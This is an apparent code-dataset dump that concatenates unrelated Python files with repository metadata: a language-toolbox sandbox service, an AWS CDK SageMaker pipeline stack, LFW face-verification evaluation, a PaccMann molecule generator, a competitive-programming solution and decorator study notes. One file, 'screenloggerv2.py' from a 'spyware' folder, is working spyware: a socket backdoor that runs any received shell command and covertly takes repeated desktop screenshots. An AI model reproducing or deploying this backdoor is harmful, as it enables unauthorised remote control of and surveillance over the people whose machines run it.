from os.path import abspath, dirname, join
from .AstTransformer import AstTransformer
from .Utility import Utility
import ast, json, sys
# Retrieve the enum values for the list of processing capabilities
CAPABILITIES = dict(common_messages.Capabilities.items())
class LanguageModuleImp(service.LanguageModuleServicer):
def __init__(self):
# Read our I/O matching and unit test template code
scriptDir = dirname(abspath(__file__))
dataDir = join(scriptDir, 'data')
self.ioHarness = Utility.readFile(join(dataDir, 'IOMatchingHarness.py'))
self.testHarness = Utility.readFile(join(dataDir, 'UnitTestHarness.py'))
self.testCaseTemplate = Utility.readFile(join(dataDir, 'TestCaseTemplate.py'))
def GetCapabilities(self, request, context):
return common_messages.LanguageCapabilities(
language = 'python',
capabilities = CAPABILITIES['GENERATE_ASTS'] | CAPABILITIES['IO_MATCHING'] | CAPABILITIES['UNIT_TESTING']
)
def GetSandboxDetails(self, request, context):
return language_messages.SandboxDetails(
image = 'adamrehn/language-toolbox-sandbox-python',
command = ['bash', '-c', 'cat > /tmp/temp.py && python3 /tmp/temp.py']
)
def GenerateAst(self, request, context):
parsed = ast.parse(request.source)
transform = AstTransformer()
transformed = transform.visit(parsed)
return common_messages.GenerateAstResponse(ast=json.dumps(transformed))
def CodegenIOCapture(self, request, context):
# Inject the source code and stdin data into our template code
combinedCode = self.ioHarness.replace('$$__USER_CODE__$$', request.source + '\n\n' + request.invocation)
combinedCode = combinedCode.replace('$$__STDIN_DATA__$$', request.stdin.replace("'''", "\\'\\'\\'"))
return language_messages.CodegenIOCaptureResponse(error="", data=combinedCode.encode('utf-8'))
def CodegenUnitTests(self, request, context):
# Iterate over each unit test and generate the source code for its test cases
testCaseCode = ''
for test in request.tests:
testCaseCode += '_______unitTestResultVectors.append({"result": []})\n'
testCaseCode += test.setup + '\n'
for case in test.cases:
testCaseCode += case.setup + '\n'
testCaseCode += self.testCaseTemplate.replace('$$__INVOCATION__$$', '{}({})'.format(test.invocation, ','.join(case.inputs)))
testCaseCode += case.teardown + '\n'
testCaseCode += test.teardown + '\n'
# Inject the generated code into our template code
combinedCode = self.testHarness.replace('$$__USER_CODE__$$', request.source)
combinedCode = combinedCode.replace('$$__TEST_CASE_CODE__$$', testCaseCode)
return language_messages.CodegenUnitTestsResponse(error="", data=combinedCode.encode('utf-8'))
| 42.552239
| 128
| 0.744651
|
51cc019b08ec4ee19a0bdf1b81d018c81dfe4717
| 2,393
|
py
|
Python
|
batch_pipeline/infra/sagemaker_pipeline_stack.py
|
brightsparc/amazon-sagemaker-drift-detection
|
020d34d17ba2c987d2831260b1690dbf96432e6b
|
[
"MIT-0"
] | 1
|
2021-08-31T23:14:35.000Z
|
2021-08-31T23:14:35.000Z
|
batch_pipeline/infra/sagemaker_pipeline_stack.py
|
brightsparc/amazon-sagemaker-drift-detection
|
020d34d17ba2c987d2831260b1690dbf96432e6b
|
[
"MIT-0"
] | null | null | null |
batch_pipeline/infra/sagemaker_pipeline_stack.py
|
brightsparc/amazon-sagemaker-drift-detection
|
020d34d17ba2c987d2831260b1690dbf96432e6b
|
[
"MIT-0"
] | 1
|
2021-08-31T04:16:54.000Z
|
2021-08-31T04:16:54.000Z
|
from aws_cdk import (
core,
aws_cloudwatch as cloudwatch,
aws_iam as iam,
aws_lambda as lambda_,
aws_sagemaker as sagemaker,
)
import logging
from batch_config import DriftConfig
logger = logging.getLogger(__name__)
# Create a SageMaker Pipeline resource with a given pipeline_definition
# see: https://docs.aws.amazon.com/cdk/api/latest/python/aws_cdk.aws_sagemaker/CfnPipeline.html
class SageMakerPipelineStack(core.Stack):
def __init__(
self,
scope: core.Construct,
construct_id: str,
pipeline_name: str,
pipeline_description: str,
pipeline_definition_bucket: str,
pipeline_definition_key: str,
sagemaker_role_arn: str,
tags: list,
drift_config: DriftConfig,
**kwargs,
) -> None:
super().__init__(scope, construct_id, **kwargs)
sagemaker.CfnPipeline(
self,
"Pipeline",
pipeline_name=pipeline_name,
pipeline_description=pipeline_description,
pipeline_definition={
"PipelineDefinitionS3Location": {
"Bucket": pipeline_definition_bucket,
"Key": pipeline_definition_key,
}
},
role_arn=sagemaker_role_arn,
tags=tags,
)
if drift_config is not None:
# Create a CW alarm (which will be picked up by build pipeline)
alarm_name = f"sagemaker-{pipeline_name}-threshold"
cloudwatch.CfnAlarm(
self,
"DriftAlarm",
alarm_name=alarm_name,
alarm_description=f"Batch Drift Threshold",
metric_name=drift_config.metric_name,
threshold=drift_config.metric_threshold,
namespace="aws/sagemaker/ModelBuildingPipeline/data-metrics",
comparison_operator=drift_config.comparison_operator,
dimensions=[
cloudwatch.CfnAlarm.DimensionProperty(
name="PipelineName", value=pipeline_name
),
],
evaluation_periods=drift_config.evaluation_periods,
period=drift_config.period,
datapoints_to_alarm=drift_config.datapoints_to_alarm,
statistic=drift_config.statistic,
)
| 33.704225
| 95
| 0.600084
|
68d4da14187bb08c949fb547323380162eb2141e
| 12,181
|
py
|
Python
|
src/eval/lfw.py
|
longchr123/insightface-analysis
|
c6c0313e880497c037b55182297954e7c0a8c101
|
[
"MIT"
] | null | null | null |
src/eval/lfw.py
|
longchr123/insightface-analysis
|
c6c0313e880497c037b55182297954e7c0a8c101
|
[
"MIT"
] | null | null | null |
src/eval/lfw.py
|
longchr123/insightface-analysis
|
c6c0313e880497c037b55182297954e7c0a8c101
|
[
"MIT"
] | null | null | null |
"""Helper for evaluation on the Labeled Faces in the Wild dataset
"""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from scipy import misc
from sklearn.model_selection import KFold
from scipy import interpolate
import sklearn
from sklearn.decomposition import PCA
import mxnet as mx
from mxnet import ndarray as nd
def calculate_roc(thresholds, embeddings1, embeddings2, actual_issame, nrof_folds=10, pca=0):
assert (embeddings1.shape[0] == embeddings2.shape[0])
assert (embeddings1.shape[1] == embeddings2.shape[1])
nrof_pairs = min(len(actual_issame), embeddings1.shape[0])
nrof_thresholds = len(thresholds)
k_fold = KFold(n_splits=nrof_folds, shuffle=False)
tprs = np.zeros((nrof_folds, nrof_thresholds))
fprs = np.zeros((nrof_folds, nrof_thresholds))
accuracy = np.zeros((nrof_folds))
indices = np.arange(nrof_pairs)
# print('pca', pca)
if pca == 0:
diff = np.subtract(embeddings1, embeddings2)
dist = np.sum(np.square(diff), 1)
for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):
# print('train_set', train_set)
# print('test_set', test_set)
if pca > 0:
print('doing pca on', fold_idx)
embed1_train = embeddings1[train_set]
embed2_train = embeddings2[train_set]
_embed_train = np.concatenate((embed1_train, embed2_train), axis=0)
# print(_embed_train.shape)
pca_model = PCA(n_components=pca)
pca_model.fit(_embed_train)
embed1 = pca_model.transform(embeddings1)
embed2 = pca_model.transform(embeddings2)
embed1 = sklearn.preprocessing.normalize(embed1)
embed2 = sklearn.preprocessing.normalize(embed2)
# print(embed1.shape, embed2.shape)
diff = np.subtract(embed1, embed2)
dist = np.sum(np.square(diff), 1)
# Find the best threshold for the fold
acc_train = np.zeros((nrof_thresholds))
for threshold_idx, threshold in enumerate(thresholds):
_, _, acc_train[threshold_idx] = calculate_accuracy(threshold, dist[train_set], actual_issame[train_set])
best_threshold_index = np.argmax(acc_train)
for threshold_idx, threshold in enumerate(thresholds):
tprs[fold_idx, threshold_idx], fprs[fold_idx, threshold_idx], _ = calculate_accuracy(threshold,
dist[test_set],
actual_issame[
test_set])
_, _, accuracy[fold_idx] = calculate_accuracy(thresholds[best_threshold_index], dist[test_set],
actual_issame[test_set])
tpr = np.mean(tprs, 0)
fpr = np.mean(fprs, 0)
return tpr, fpr, accuracy
def calculate_accuracy(threshold, dist, actual_issame):
predict_issame = np.less(dist, threshold)
tp = np.sum(np.logical_and(predict_issame, actual_issame))
fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))
tn = np.sum(np.logical_and(np.logical_not(predict_issame), np.logical_not(actual_issame)))
fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issame))
tpr = 0 if (tp + fn == 0) else float(tp) / float(tp + fn)
fpr = 0 if (fp + tn == 0) else float(fp) / float(fp + tn)
acc = float(tp + tn) / dist.size
return tpr, fpr, acc
def calculate_val(thresholds, embeddings1, embeddings2, actual_issame, far_target, nrof_folds=10):
assert (embeddings1.shape[0] == embeddings2.shape[0])
assert (embeddings1.shape[1] == embeddings2.shape[1])
nrof_pairs = min(len(actual_issame), embeddings1.shape[0])
nrof_thresholds = len(thresholds)
k_fold = KFold(n_splits=nrof_folds, shuffle=False)
val = np.zeros(nrof_folds)
far = np.zeros(nrof_folds)
diff = np.subtract(embeddings1, embeddings2)
dist = np.sum(np.square(diff), 1)
indices = np.arange(nrof_pairs)
for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):
# Find the threshold that gives FAR = far_target
far_train = np.zeros(nrof_thresholds)
for threshold_idx, threshold in enumerate(thresholds):
_, far_train[threshold_idx] = calculate_val_far(threshold, dist[train_set], actual_issame[train_set])
if np.max(far_train) >= far_target:
f = interpolate.interp1d(far_train, thresholds, kind='slinear')
threshold = f(far_target)
else:
threshold = 0.0
val[fold_idx], far[fold_idx] = calculate_val_far(threshold, dist[test_set], actual_issame[test_set])
val_mean = np.mean(val)
far_mean = np.mean(far)
val_std = np.std(val)
return val_mean, val_std, far_mean
def calculate_val_far(threshold, dist, actual_issame):
predict_issame = np.less(dist, threshold)
true_accept = np.sum(np.logical_and(predict_issame, actual_issame))
false_accept = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))
n_same = np.sum(actual_issame)
n_diff = np.sum(np.logical_not(actual_issame))
val = float(true_accept) / float(n_same)
far = float(false_accept) / float(n_diff)
return val, far
def evaluate(embeddings, actual_issame, nrof_folds=10, pca=0):
# Calculate evaluation metrics
thresholds = np.arange(0, 4, 0.01)
embeddings1 = embeddings[0::2]
embeddings2 = embeddings[1::2]
tpr, fpr, accuracy = calculate_roc(thresholds, embeddings1, embeddings2,
np.asarray(actual_issame), nrof_folds=nrof_folds, pca=pca)
thresholds = np.arange(0, 4, 0.001)
val, val_std, far = calculate_val(thresholds, embeddings1, embeddings2,
np.asarray(actual_issame), 1e-3, nrof_folds=nrof_folds)
return tpr, fpr, accuracy, val, val_std, far
def get_paths(lfw_dir, pairs, file_ext):
"""pairs中,Andrea_Bowen 43 13 表示同一个人,Alley_Mills 31 Bobbie_Eakes 34 表示不同人"""
nrof_skipped_pairs = 0
path_list = []
issame_list = []
for pair in pairs:
if len(pair) == 3:
path0 = os.path.join(lfw_dir, pair[0], pair[0] + '_' + '%04d' % int(pair[1]) + '.' + file_ext)
path1 = os.path.join(lfw_dir, pair[0], pair[0] + '_' + '%04d' % int(pair[2]) + '.' + file_ext)
issame = True
elif len(pair) == 4:
path0 = os.path.join(lfw_dir, pair[0], pair[0] + '_' + '%04d' % int(pair[1]) + '.' + file_ext)
path1 = os.path.join(lfw_dir, pair[2], pair[2] + '_' + '%04d' % int(pair[3]) + '.' + file_ext)
issame = False
if os.path.exists(path0) and os.path.exists(path1): # Only add the pair if both paths exist
# 向后加数据,path_list是一维数据
path_list += (path0, path1)
issame_list.append(issame)
else:
print('not exists', path0, path1)
nrof_skipped_pairs += 1
if nrof_skipped_pairs > 0:
print('Skipped %d image pairs' % nrof_skipped_pairs)
return path_list, issame_list
def read_pairs(pairs_filename):
pairs = []
with open(pairs_filename, 'r') as f:
for line in f.readlines()[1:]:
pair = line.strip().split()
pairs.append(pair)
return np.array(pairs)
def load_dataset(lfw_dir, image_size):
lfw_pairs = read_pairs(os.path.join(lfw_dir, 'pairs.txt'))
lfw_paths, issame_list = get_paths(lfw_dir, lfw_pairs, 'jpg')
lfw_data_list = []
for flip in [0, 1]:
lfw_data = nd.empty((len(lfw_paths), 3, image_size[0], image_size[1]))
lfw_data_list.append(lfw_data)
i = 0
for path in lfw_paths:
with open(path, 'rb') as fin:
_bin = fin.read()
img = mx.image.imdecode(_bin)
img = nd.transpose(img, axes=(2, 0, 1))
for flip in [0, 1]:
if flip == 1:
img = mx.ndarray.flip(data=img, axis=2)
lfw_data_list[flip][i][:] = img
i += 1
if i % 1000 == 0:
print('loading lfw', i)
print(lfw_data_list[0].shape)
print(lfw_data_list[1].shape)
return (lfw_data_list, issame_list)
def test(lfw_set, mx_model, batch_size):
print('testing lfw..')
lfw_data_list = lfw_set[0]
issame_list = lfw_set[1]
model = mx_model
embeddings_list = []
for i in range(len(lfw_data_list)):
lfw_data = lfw_data_list[i]
embeddings = None
ba = 0
while ba < lfw_data.shape[0]:
bb = min(ba + batch_size, lfw_data.shape[0])
_data = nd.slice_axis(lfw_data, axis=0, begin=ba, end=bb)
_label = nd.ones((bb - ba,))
# print(_data.shape, _label.shape)
db = mx.io.DataBatch(data=(_data,), label=(_label,))
model.forward(db, is_train=False)
net_out = model.get_outputs()
# _arg, _aux = model.get_params()
# __arg = {}
# for k,v in _arg.iteritems():
# __arg[k] = v.as_in_context(_ctx)
# _arg = __arg
# _arg["data"] = _data.as_in_context(_ctx)
# _arg["softmax_label"] = _label.as_in_context(_ctx)
# for k,v in _arg.iteritems():
# print(k,v.context)
# exe = sym.bind(_ctx, _arg ,args_grad=None, grad_req="null", aux_states=_aux)
# exe.forward(is_train=False)
# net_out = exe.outputs
_embeddings = net_out[0].asnumpy()
# print(_embeddings.shape)
if embeddings is None:
embeddings = np.zeros((lfw_data.shape[0], _embeddings.shape[1]))
embeddings[ba:bb, :] = _embeddings
ba = bb
embeddings_list.append(embeddings)
_xnorm = 0.0
_xnorm_cnt = 0
for embed in embeddings_list:
for i in range(embed.shape[0]):
_em = embed[i]
_norm = np.linalg.norm(_em)
# print(_em.shape, _norm)
_xnorm += _norm
_xnorm_cnt += 1
_xnorm /= _xnorm_cnt
embeddings = embeddings_list[0].copy()
embeddings = sklearn.preprocessing.normalize(embeddings)
_, _, accuracy, val, val_std, far = evaluate(embeddings, issame_list, nrof_folds=10)
acc1, std1 = np.mean(accuracy), np.std(accuracy)
# print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' % (val, val_std, far))
# embeddings = np.concatenate(embeddings_list, axis=1)
embeddings = embeddings_list[0] + embeddings_list[1]
embeddings = sklearn.preprocessing.normalize(embeddings)
print(embeddings.shape)
_, _, accuracy, val, val_std, far = evaluate(embeddings, issame_list, nrof_folds=10)
acc2, std2 = np.mean(accuracy), np.std(accuracy)
return acc1, std1, acc2, std2, _xnorm, embeddings_list
| 42.295139
| 117
| 0.628684
|
02d683bb77fcf3d544db0af5d4d5b22ba318e5ac
| 9,098
|
py
|
Python
|
src/gt4sd/algorithms/conditional_generation/paccmann_rl/core.py
|
hhhsu0825/gt4sd-core
|
4a1fe9da58d2f33bba2fba64604427e037ad7a46
|
[
"MIT"
] | 1
|
2022-02-22T02:06:10.000Z
|
2022-02-22T02:06:10.000Z
|
src/gt4sd/algorithms/conditional_generation/paccmann_rl/core.py
|
hhhsu0825/gt4sd-core
|
4a1fe9da58d2f33bba2fba64604427e037ad7a46
|
[
"MIT"
] | 12
|
2022-02-21T12:59:24.000Z
|
2022-02-22T12:25:49.000Z
|
src/gt4sd/algorithms/conditional_generation/paccmann_rl/core.py
|
hhhsu0825/gt4sd-core
|
4a1fe9da58d2f33bba2fba64604427e037ad7a46
|
[
"MIT"
] | null | null | null |
"""PaccMann\\ :superscript:`RL` Algorithm.
PaccMann\\ :superscript:`RL` generation is conditioned via reinforcement learning.
"""
import logging
from dataclasses import field
from typing import Any, Callable, ClassVar, Dict, Iterable, Optional, TypeVar
from typing_extensions import Protocol, runtime_checkable
from ....domains.materials import Omics, Protein, SmallMolecule
from ....exceptions import InvalidItem
from ...core import AlgorithmConfiguration, GeneratorAlgorithm
from ...registry import ApplicationsRegistry
from .implementation import (
ConditionalGenerator,
ProteinSequenceConditionalGenerator,
TranscriptomicConditionalGenerator,
)
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
T = TypeVar("T", Protein, Omics)
S = TypeVar("S", bound=SmallMolecule)
Targeted = Callable[[T], Iterable[Any]]
class PaccMannRL(GeneratorAlgorithm[S, T]):
"""PaccMann\\ :superscript:`RL` Algorithm."""
def __init__(
self,
configuration: AlgorithmConfiguration[S, T],
target: Optional[T],
):
"""Instantiate PaccMannRL ready to generate items.
Args:
configuration: domain and application
specification defining parameters, types and validations.
target: a target for which to generate items.
Example:
An example for generating small molecules (SMILES) with high affinity
for a target protein::
affinity_config = PaccMannRLProteinBasedGenerator()
target = "MVLSPADKTNVKAAWGKVGAHAGEYGAEALERMFLSFPTT"
paccmann_affinity = PaccMannRL(configuration=affinity_config, target=target)
items = list(paccmann_affinity.sample(10))
print(items)
"""
configuration = self.validate_configuration(configuration)
# TODO there might also be a validation/check on the target input
super().__init__(
configuration=configuration, # type:ignore
target=target, # type:ignore
)
def get_generator(
self,
configuration: AlgorithmConfiguration[S, T],
target: Optional[T],
) -> Targeted[T]:
"""Get the function to sample batches via PaccMannRL's ConditionalGenerator.
Args:
configuration: helps to set up specific application of PaccMannRL.
target: context or condition for the generation.
Returns:
callable with target generating a batch of items.
"""
logger.info("ensure artifacts for the application are present.")
self.local_artifacts = configuration.ensure_artifacts()
implementation: ConditionalGenerator = configuration.get_conditional_generator( # type: ignore
self.local_artifacts
)
return implementation.generate_batch
def validate_configuration(
self, configuration: AlgorithmConfiguration[S, T]
) -> AlgorithmConfiguration[S, T]:
@runtime_checkable
class AnyPaccMannRLConfiguration(Protocol):
"""Protocol for PaccMannRL configurations."""
def get_conditional_generator(
self, resources_path: str
) -> ConditionalGenerator:
...
def validate_item(self, item: Any) -> S:
...
# TODO raise InvalidAlgorithmConfiguration
assert isinstance(configuration, AnyPaccMannRLConfiguration)
assert isinstance(configuration, AlgorithmConfiguration)
return configuration
@ApplicationsRegistry.register_algorithm_application(PaccMannRL)
class PaccMannRLProteinBasedGenerator(AlgorithmConfiguration[SmallMolecule, Protein]):
"""
Configuration to generate compounds with high affinity to a target protein.
Implementation from the paper: https://doi.org/10.1088/2632-2153/abe808.
"""
algorithm_type: ClassVar[str] = "conditional_generation"
domain: ClassVar[str] = "materials"
algorithm_version: str = "v0"
batch_size: int = field(
default=32,
metadata=dict(description="Batch size used for the generative model sampling."),
)
temperature: float = field(
default=1.4,
metadata=dict(
description="Temperature parameter for the softmax sampling in decoding."
),
)
generated_length: int = field(
default=100,
metadata=dict(
description="Maximum length in tokens of the generated molcules (relates to the SMILES length)."
),
)
def get_target_description(self) -> Dict[str, str]:
"""Get description of the target for generation.
Returns:
target description.
"""
return {
"title": "Target protein sequence",
"description": "AA sequence of the protein target to generate non-toxic ligands against.",
"type": "string",
}
def get_conditional_generator(
self, resources_path: str
) -> ProteinSequenceConditionalGenerator:
"""Instantiate the actual generator implementation.
Args:
resources_path: local path to model files.
Returns:
instance with :meth:`generate_batch<gt4sd.algorithms.conditional_generation.paccmann_rl.implementation.ConditionalGenerator.generate_batch>` method for targeted generation.
"""
return ProteinSequenceConditionalGenerator(
resources_path=resources_path,
temperature=self.temperature,
generated_length=self.generated_length,
samples_per_protein=self.batch_size,
)
def validate_item(self, item: str) -> SmallMolecule:
"""Check that item is a valid SMILES.
Args:
item: a generated item that is possibly not valid.
Raises:
InvalidItem: in case the item can not be validated.
Returns:
the validated SMILES.
"""
(
molecules,
_,
) = ProteinSequenceConditionalGenerator.validate_molecules([item])
if molecules[0] is None:
raise InvalidItem(
title="InvalidSMILES",
detail=f'rdkit.Chem.MolFromSmiles returned None for "{item}"',
)
return SmallMolecule(item)
@ApplicationsRegistry.register_algorithm_application(PaccMannRL)
class PaccMannRLOmicBasedGenerator(AlgorithmConfiguration[SmallMolecule, Omics]):
"""
Configuration to generate compounds with low IC50 for a target omics profile.
Implementation from the paper: https://doi.org/10.1016/j.isci.2021.102269.
"""
algorithm_type: ClassVar[str] = "conditional_generation"
domain: ClassVar[str] = "materials"
algorithm_version: str = "v0"
batch_size: int = field(
default=32,
metadata=dict(description="Batch size used for the generative model sampling."),
)
temperature: float = field(
default=1.4,
metadata=dict(
description="Temperature parameter for the softmax sampling in decoding."
),
)
generated_length: int = field(
default=100,
metadata=dict(
description="Maximum length in tokens of the generated molcules (relates to the SMILES length)."
),
)
def get_target_description(self) -> Dict[str, str]:
"""Get description of the target for generation.
Returns:
target description.
"""
return {
"title": "Gene expression profile",
"description": "A gene expression profile to generate effective molecules against.",
"type": "list",
}
def get_conditional_generator(
self, resources_path: str
) -> TranscriptomicConditionalGenerator:
"""Instantiate the actual generator implementation.
Args:
resources_path: local path to model files.
Returns:
instance with :meth:`generate_batch<gt4sd.algorithms.conditional_generation.paccmann_rl.implementation.ConditionalGenerator.generate_batch>` method for targeted generation.
"""
return TranscriptomicConditionalGenerator(
resources_path=resources_path,
temperature=self.temperature,
generated_length=self.generated_length,
samples_per_profile=self.batch_size,
)
def validate_item(self, item: str) -> SmallMolecule:
"""Check that item is a valid SMILES.
Args:
item: a generated item that is possibly not valid.
Raises:
InvalidItem: in case the item can not be validated.
Returns:
the validated SMILES.
"""
(
molecules,
_,
) = TranscriptomicConditionalGenerator.validate_molecules([item])
if molecules[0] is None:
raise InvalidItem(
title="InvalidSMILES",
detail=f'rdkit.Chem.MolFromSmiles returned None for "{item}"',
)
return SmallMolecule(item)
| 33.696296
| 184
| 0.647725
|
370e849fb95c18bce260bb8c2811cb9a62936083
| 1,659
|
py
|
Python
|
spyware/screenloggerv2.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
spyware/screenloggerv2.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
spyware/screenloggerv2.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
#-*-coding: utf-8-*-
from socket import *
from os import popen, getcwd, chdir
from getpass import getuser
from pyautogui import screenshot
from threading import *
from datetime import date
from time import sleep
class Bd():
def __init__(self, ip = "127.0.0.1", port = 5000):
sock = socket(AF_INET, SOCK_STREAM)
sock.bind(("127.0.0.1", 5000))
sock.listen(1)
self.conn, addr = sock.accept()
t = int()
d = "C:\\Users\\{}\\Pictures\\".format(getuser())
self.check = False
while True:
cmd = self.conn.recv(1024).decode()
if cmd[:2] == "cd":
try:
chdir(cmd[3:])
except:
pass
finally:
self.conn.send("{}".format(getcwd()).encode())
elif cmd == "sass":
self.check = True
f = Thread(target=self.photo,args=(t, d,))
f.daemon = True
f.start()
elif cmd[:6] == "setdir":
try:
d = cmd[7:]
except Exception as e:
self.conn.send("{}".format(e).encode())
else:
self.conn.send("Variable declarada correctamente.".encode())
elif cmd[:7] =="settime":
try:
t = int(cmd[8:])
except Exception as e:
self.conn.send("{}".format(e).encode())
else:
self.conn.send("Variable declarada correctamente".encode())
elif cmd == "stopss":
self.check = False
else:
out = popen(cmd).read()
self.conn.send(out.encode())
def photo(self, time, dr):
chdir(dr)
count = 1
while True:
if self.check == False:
self.conn.send("Se han detenido las capturas de pantalla.".encode())
break
ss = screenshot()
ss.save("{}-{}.png".format(date.today(),count))
count += 1
sleep(time)
if __name__ == '__main__':
main = Bd()
| 21.828947
| 72
| 0.601567
|
c3a95581e9831f5cb6554c1ce51f783811b1f71a
| 364
|
py
|
Python
|
ARC/arc101-arc150/arc109/b/main.py
|
KATO-Hiro/AtCoder
|
cbbdb18e95110b604728a54aed83a6ed6b993fde
|
[
"CC0-1.0"
] | 2
|
2020-06-12T09:54:23.000Z
|
2021-05-04T01:34:07.000Z
|
ARC/arc101-arc150/arc109/b/main.py
|
KATO-Hiro/AtCoder
|
cbbdb18e95110b604728a54aed83a6ed6b993fde
|
[
"CC0-1.0"
] | 961
|
2020-06-23T07:26:22.000Z
|
2022-03-31T21:34:52.000Z
|
ARC/arc101-arc150/arc109/b/main.py
|
KATO-Hiro/AtCoder
|
cbbdb18e95110b604728a54aed83a6ed6b993fde
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
def main():
import sys
input = sys.stdin.readline
n = int(input())
low = 1
high = n + 1
while (high - low) > 1:
mid = (high + low) // 2
if mid * (mid + 1) <= 2 * (n + 1):
low = mid
else:
high = mid
print(n - low + 1)
if __name__ == "__main__":
main()
| 14
| 42
| 0.414835
|
58af8afeb8e652ae0b0280d30b9f2e511c87650b
| 980
|
py
|
Python
|
src/cost_volume.py
|
hmarechal/gcnet_stereo
|
80f681ec6a52638c38f039d6117ee9475e55d7db
|
[
"MIT"
] | 5
|
2018-05-18T22:13:36.000Z
|
2019-05-07T10:04:34.000Z
|
src/cost_volume.py
|
hmarechal/gcnet_stereo
|
80f681ec6a52638c38f039d6117ee9475e55d7db
|
[
"MIT"
] | null | null | null |
src/cost_volume.py
|
hmarechal/gcnet_stereo
|
80f681ec6a52638c38f039d6117ee9475e55d7db
|
[
"MIT"
] | 5
|
2018-04-02T09:00:34.000Z
|
2018-11-23T14:34:45.000Z
|
from keras import backend as K
# from keras.layers.core import Lambda
# from keras.layers.core import Reshape
def _concat_features(lf, states):
b,f,h,w = lf.get_shape().as_list()
rf = states[0]
rfs = rf[:, :, :, :-1]
disp_rfs = K.spatial_2d_padding(rfs, padding=((0, 0), (1, 0)), data_format='channels_first')
concat = K.concatenate([lf, rf], axis=2)
output = K.reshape(concat, (-1, 2*f, h, w))
return output, [disp_rfs]
def cost_volume(inputs, dmax):
left_feature = inputs[0]
right_feature = inputs[1]
left_feature = K.expand_dims(left_feature, axis=1)
left_feature = K.repeat_elements(left_feature, dmax, axis=1)
l,o,n = K.rnn(_concat_features, inputs=left_feature, initial_states=[right_feature], unroll=True)
return K.permute_dimensions(o, (0, 2, 1, 3, 4))
# class CostVolumeBuilder():
# @classmethod
# def get_layer(cls, D):
# return Lambda(cost_volume, arguments = {'d':D/2})
| 36.296296
| 102
| 0.64898
|
584ca853b2bfa3bd9fae0c8d96e74d7354882492
| 2,958
|
py
|
Python
|
my_classes/ScopesClosuresAndDecorators/.history/Decoraators2_20210716232429.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
my_classes/ScopesClosuresAndDecorators/.history/Decoraators2_20210716232429.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
my_classes/ScopesClosuresAndDecorators/.history/Decoraators2_20210716232429.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
""" Decorator Parametors
In the previous ideos we saw some built-in decorators that can handle some arguments:
@wraps(fn) @lru_cache(maxsize=256) <\
def inner(): def factorial(n): \
... ... \>function call
This should look quite differient grom the decorators we have been creating and using:
@timed <----------- no function call
def Fibonacci(n):
...
"""
from symbol import parameters
from time import perf_counter
from unittest import result
def timed(fn):
from time import perf_counter
def inner(*arhs, **kwarrgs):
total_elapse = 0
for i in range(10): # hardcoded value 10 # need to pass as a parameter
start = perf_counter()
result = fn(*args, **kwargs)
total_elapsed += (perf_counter() - start)
avg_elapsed = total_elapsed / 10
print(avg_elapsed)
return result
return inner
"""
@timed
def my_func(): or my_func = timed(my_func)
...
On e Approach to passing (line 24) as a parameter
/ < extra parameter
def timed(fn, reps):
from time import perf_counter
def inner(*args, **kwargs):
total_elapsed = 0 / free variable
for i in range(reps): <
start = perf_counter()
result = fn(*ars, **kwargs)
total_elapsed += (perf_counter() - start)
avg_elapsed = total_elapsed / reps
print(avg_elapsed)
return result
return inner
my_func = timed(my_func, 10)
# Rethinking the solution
@timed
def my_func(): my_func = timed solution(my_func)
...
So, timed is a function that returns that inner closure that contains our original function
In order for this to work as intended:
@timed(10)
def my_func():
...
dec = timed(10) # will need to return our original timed decorator when called
dec = timed(10) # timed(10) returns a decorator
@dec
def my_func():
...
# Nested closures to the rescue!
def timed(fn): # Timed is basically a decorator == it only takes a single parameter
from time import perf_counter
def inner(*args, **kwargs):
total_elapsed = 0 / free variable bound to reps in outer
for i in range(reps): <
start = perf_counter()
result = fn(*ars, **kwargs)
total_elapsed += (perf_counter() - start)
avg_elapsed = total_elapsed / reps
print(avg_elapsed)
return result
return inner
return timed # cslling outer(n) returns our originsl decorator withrepd det to n (free variable)
my_func = outer(10)(my_func) or @outer(10)
def my_func():
...
# Decorator Factories
The outer function is not itseld a decorator
"""
| 25.282051
| 103
| 0.576065
|
880b13e328ec7a153cb10072b8dd9fe017c14a72
| 8,584
|
py
|
Python
|
python/tests/test_nessie_cli.py
|
naren-dremio/nessie
|
fad41d58ba8d32a77b60cf4eed6fc62816a8ee28
|
[
"Apache-2.0"
] | null | null | null |
